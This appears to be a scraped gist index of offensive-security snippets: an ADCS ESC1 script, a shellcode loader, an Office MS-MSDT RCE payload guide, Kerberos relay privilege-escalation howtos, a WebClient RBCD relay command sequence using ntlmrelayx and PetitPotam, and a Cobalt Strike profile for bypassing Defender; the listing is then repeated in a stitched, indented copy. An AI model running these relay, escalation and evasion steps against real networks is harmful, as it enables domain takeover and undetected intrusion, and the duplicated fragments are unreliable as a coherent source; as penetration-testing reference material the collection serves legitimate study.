snovvcrash snovvcrash

## Program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
    // CCOB IS THE GOAT

## esc1.ps1
#Thank you @NotMedic for troubleshooting/validating stuff!

$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER

## GBC.ps1
$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

function Show-Menu {
    Clear-Host
    Write-Host "======================================================"
    Write-Host "================ Give Back Control ================"
    Write-Host "======================================================"
    if($elevated -eq $true){
        Write-Host "Local Admin: " -ForegroundColor white -NoNewline; Write-Host $elevated -ForegroundColor Green
        Write-Host "We have superpowers. Ready to continue."

## ms-msdt.MD

      
              1 file
            
          
              56 forks
            
          
              24 comments
            
          
              153 stars
            
          
                tothi
                / ms-msdt.MD
            
            
              Last active
              April 18, 2024 02:22
            
              
                The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
              
          
    MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:

Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.


## certifried_with_krbrelayup.md

      
              1 file
            
          
              29 forks
            
          
              0 comments
            
          
              94 stars
            
          
                tothi
                / certifried_with_krbrelayup.md
            
            
              Last active
              November 22, 2023 10:47
            
              
                Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
              
          
    Certifried combined with KrbRelayUp


Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts
or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user
on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged
domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:

  
## krbrelay_privesc_howto.md

      
              1 file
            
          
              17 forks
            
          
              0 comments
            
          
              103 stars
            
          
                tothi
                / krbrelay_privesc_howto.md
            
            
              Last active
              March 1, 2024 12:26
            
              
                Privilege Escalation using KrbRelay and RBCD
              
          
    KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:

LDAP signing not required on Domain Controller (default!)


## Dynamic_PInvoke_Shellcode.cs
//original runner by @Arno0x: https://github.com/Arno0x/CSharpScripts/blob/master/shellcodeLauncher.cs

using System;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;

namespace ShellcodeLoader
{
    class Program

## webclient-rbcd.sh
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER

## minimal-defender-bypass.profile
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works

set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";

stage {
  set allocator "MapViewOfFile";
  set name "notevil.dll";

## no_strings.hpp
// Copyright (C) 2022 Evan McBroom
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
	using System;
	using System.Collections.Generic;
	using System.Linq;
	using System.Runtime.CompilerServices;
	using System.Net;
	using System.Reflection;
	using System.Runtime.InteropServices;
	namespace Test
	{
	// CCOB IS THE GOAT
	#Thank you @NotMedic for troubleshooting/validating stuff!

	$password = Read-Host -Prompt "Enter Password"
	#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

	$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
	$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
	$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
	$CASERVER = "alexlab-dc01-ca" #CA name.
	$CA = $CAFQDN + "\" + $CASERVER
	$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

	function Show-Menu {
	Clear-Host
	Write-Host "======================================================"
	Write-Host "================ Give Back Control ================"
	Write-Host "======================================================"
	if($elevated -eq $true){
	Write-Host "Local Admin: " -ForegroundColor white -NoNewline; Write-Host $elevated -ForegroundColor Green
	Write-Host "We have superpowers. Ready to continue."
	//original runner by @Arno0x: https://github.com/Arno0x/CSharpScripts/blob/master/shellcodeLauncher.cs

	using System;
	using System.Runtime.InteropServices;
	using System.Reflection;
	using System.Reflection.Emit;

	namespace ShellcodeLoader
	{
	class Program
	# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
	python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

	# setting up a LDAPS relay to grant RBCD to computer account we have
	# in my case MAQ = 0, so I escalated on a domain workstation and used it
	sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

	# PetitPotam to WebDAV with domain credentials (not patched)
	# DO NOT use FQDN here
	python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER
	# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
	# as stage0, remote injecting a thread into a suspended process works

	set host_stage "false";
	set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
	set sleeptime "10000";

	stage {
	set allocator "MapViewOfFile";
	set name "notevil.dll";
	// Copyright (C) 2022 Evan McBroom
	//
	// Permission is hereby granted, free of charge, to any person obtaining a copy
	// of this software and associated documentation files (the "Software"), to deal
	// in the Software without restriction, including without limitation the rights
	// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	// copies of the Software, and to permit persons to whom the Software is
	// furnished to do so, subject to the following conditions:
	//
	// The above copyright notice and this permission notice shall be included in